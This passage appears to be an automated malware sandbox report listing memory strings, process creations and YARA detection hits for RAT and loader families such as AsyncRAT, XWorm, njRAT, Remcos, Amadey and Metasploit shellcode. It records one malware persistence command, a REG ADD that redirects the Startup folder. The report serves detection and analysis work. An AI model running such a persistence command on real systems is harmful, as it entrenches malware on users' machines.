                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0721933828_2_07219338
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0721AA2028_2_0721AA20
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0721714828_2_07217148
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0728345228_2_07283452
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0728C01928_2_0728C019
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_07284BA828_2_07284BA8
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0728147828_2_07281478
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_072BC1D028_2_072BC1D0
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_072C26B028_2_072C26B0
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_072C36B028_2_072C36B0
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_072C99F128_2_072C99F1
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0731BE9028_2_0731BE90
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0731D68728_2_0731D687
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_0731CC6C28_2_0731CC6C
                            Source: C:\Users\user\Downloads\haus\Enalib.exeCode function: 28_2_078A08D228_2_078A08D2
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 052E1D7D appears 109 times
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 052AEFE8 appears 51 times
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 052AEFE4 appears 49 times
                            Source: C:\Users\user\Downloads\haus\Loader.exeCode function: String function: 00007FF6B9581000 appears 40 times
                            Source: C:\Users\user\Desktop\wow.exeCode function: String function: 00007FF6D80B1E50 appears 53 times
                            Source: C:\Users\user\Downloads\haus\ABC.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 1036
                            Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                            Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                            Source: traf.exe.9.drStatic PE information: No import functions for PE file found
                            Source: sel1.exe.9.drStatic PE information: No import functions for PE file found
                            Source: python3.dll.0.drStatic PE information: No import functions for PE file found
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2159339518.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs wow.exe
                            Source: wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs wow.exe
                            Source: wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2189884988.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32api.pyd0 vs wow.exe
                            Source: wow.exe, 00000000.00000003.2159812724.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs wow.exe
                            Source: wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2190025964.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32evtlog.pyd0 vs wow.exe
                            Source: wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs wow.exe
                            Source: wow.exe, 00000000.00000003.2187079346.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepywintypes311.dll0 vs wow.exe
                            Source: wow.exe, 00000009.00000003.2995618572.000001D42CFA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs wow.exe
                            Source: wow.exe, 00000009.00000003.3003856773.000001D42CFFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs wow.exe
                            Source: wow.exe, 00000009.00000003.2994891214.000001D42D52C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2739599477.000001D42CDB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2739599477.000001D42CDB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs wow.exe
                            Source: wow.exe, 00000009.00000003.3066853115.000001D42CE07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2883362907.000001D42CDBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2883362907.000001D42CDBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs wow.exe
                            Source: wow.exe, 00000009.00000003.3069520822.000001D428E03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevapo.exe4 vs wow.exe
                            Source: wow.exe, 00000009.00000003.2679399837.000001D42CDAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2679399837.000001D42CDAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs wow.exe
                            Source: wow.exe, 00000009.00000003.2879710176.000001D42C672000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMonitorCPUApp.exeD vs wow.exe
                            Source: wow.exe, 00000009.00000003.2479967055.000001D42D554000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2835272747.000001D42D037000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2449407560.000001D42D03B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2432947411.000001D42C321000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Main.exe@ vs wow.exe
                            Source: wow.exe, 00000009.00000003.2342292239.000001D42CC1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2448526134.000001D42CDFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2448526134.000001D42CDFA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMonitorCPUApp.exeD vs wow.exe
                            Source: wow.exe, 00000009.00000003.3007726881.000001D42CE07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2734073314.000001D42CDAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2734073314.000001D42CDAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs wow.exe
                            Source: wow.exe, 00000009.00000003.2784006134.000001D42D01C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2377176921.000001D42C330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Watch.exe0 vs wow.exe
                            Source: wow.exe, 00000009.00000003.2846460500.000001D42CE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMonitorCPUApp.exeD vs wow.exe
                            Source: wow.exe, 00000009.00000003.2349081758.000001D42C3B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameABC.exe( vs wow.exe
                            Source: wow.exe, 00000009.00000003.2562218180.000001D42CB7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2881627835.000001D42CF10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs wow.exe
                            Source: wow.exe, 00000009.00000003.2331326155.000001D42C3A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevapo.exe4 vs wow.exe
                            Source: wow.exe, 00000009.00000003.2351696699.000001D42CB7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2563582335.000001D42CC81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2349081758.000001D42C440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2821519239.000001D428DF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevapo.exe4 vs wow.exe
                            Source: wow.exe, 00000009.00000003.2331326155.000001D42C380000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevapo.exe4 vs wow.exe
                            Source: wow.exe, 00000009.00000003.2313558824.000001D42C671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMonitorCPUApp.exeD vs wow.exe
                            Source: wow.exe, 00000009.00000003.2903506026.000001D42D03D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2995433124.000001D42D03D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2915312969.000001D428DF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevapo.exe4 vs wow.exe
                            Source: wow.exe, 00000009.00000003.2549690962.000001D42CC1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2901512124.000001D428D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevapo.exe4 vs wow.exe
                            Source: wow.exe, 00000009.00000003.2901512124.000001D428D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2572286803.000001D42C440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2540988639.000001D42C330000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Watch.exe0 vs wow.exe
                            Source: wow.exe, 00000009.00000003.3066267715.000001D42D556000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2602452812.000001D42CF10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs wow.exe
                            Source: wow.exe, 00000009.00000003.3005030157.000001D42CDDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs wow.exe
                            Source: wow.exe, 00000009.00000003.2549690962.000001D42CC80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2377176921.000001D42C300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTask32Main.exe@ vs wow.exe
                            Source: wow.exe, 00000009.00000003.2963862992.000001D428E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevapo.exe4 vs wow.exe
                            Source: wow.exe, 00000009.00000003.2342292239.000001D42CC80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2995252451.000001D42CF4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs wow.exe
                            Source: wow.exe, 00000009.00000003.3003275215.000001D42CFBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs wow.exe
                            Source: wow.exe, 00000009.00000003.2349081758.000001D42C3A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevapo.exe4 vs wow.exe
                            Source: wow.exe, 00000009.00000003.2879381009.000001D42CE01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2533641591.000001D42C671000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMonitorCPUApp.exeD vs wow.exe
                            Source: wow.exe, 00000009.00000003.2349081758.000001D42C410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.3003548070.000001D42D556000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2807337493.000001D428D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevapo.exe4 vs wow.exe
                            Source: wow.exe, 00000009.00000003.2807337493.000001D428D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEnalib.exe. vs wow.exe
                            Source: wow.exe, 00000009.00000003.2667690726.000001D42CE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMonitorCPUApp.exeD vs wow.exe
                            Source: wow.exe, 00000009.00000003.2534388518.000001D42C230000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs wow.exe
                            Source: C:\ProgramData\1be588a5b7\gdsun.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\1be588a5b7
                            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4902
                            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5267
                            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4923
                            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4923
                            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4902
                            Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Metasploit_a6e956c9 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 21855599bc51ec2f71d694d4e0f866f815efe54a42842dfe5f8857811530a686, id = a6e956c9-799e-49f9-b5c5-ac68aaa2dc21, last_modified = 2021-08-23
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                            Source: sslproxydump.pcap, type: PCAPMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                            Source: sslproxydump.pcap, type: PCAPMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                            Source: sslproxydump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: 9.3.wow.exe.1d428d2b790.97.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 28.2.Enalib.exe.7890000.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: 28.2.Enalib.exe.7890000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 9.3.wow.exe.1d428d2b790.97.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: 9.3.wow.exe.1d428d2b790.97.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 28.2.Enalib.exe.28fef3c.0.raw.unpack, type: UNPACKEDPEMatched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 28.2.Enalib.exe.28fef3c.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: 28.2.Enalib.exe.28fef3c.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 28.2.Enalib.exe.7890000.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: 28.2.Enalib.exe.7890000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 16.2.svchost.exe.5270000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                            Source: 19.0.vapo.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: 19.0.vapo.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 28.2.Enalib.exe.28fef3c.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: 28.2.Enalib.exe.28fef3c.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0000001C.00000002.2576679059.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000009.00000003.2331326155.000001D42C3A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000009.00000003.2331326155.000001D42C380000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000009.00000003.2901512124.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0000001C.00000002.2876237438.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: 0000001C.00000002.2876237438.0000000007890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000013.00000000.2272038750.00000000000E2000.00000002.00000001.01000000.0000002A.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000010.00000002.2576592704.0000000005270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                            Source: 00000009.00000003.2349081758.000001D42C3A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0000001C.00000002.2840616612.00000000072B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 00000009.00000003.2807337493.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0000001C.00000002.2576679059.0000000002648000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: C:\Users\user\Downloads\haus\amada2.exe, type: DROPPEDMatched rule: MALWARE_Win_Amadey author = ditekSHen, description = Amadey downloader payload
                            Source: C:\ProgramData\1be588a5b7\gdsun.exe, type: DROPPEDMatched rule: MALWARE_Win_Amadey author = ditekSHen, description = Amadey downloader payload
                            Source: C:\Users\user\AppData\Roaming\vapo.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: C:\Users\user\AppData\Roaming\vapo.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\Downloads\haus\vapo.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                            Source: C:\Users\user\Downloads\haus\vapo.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: traf.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: traf.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
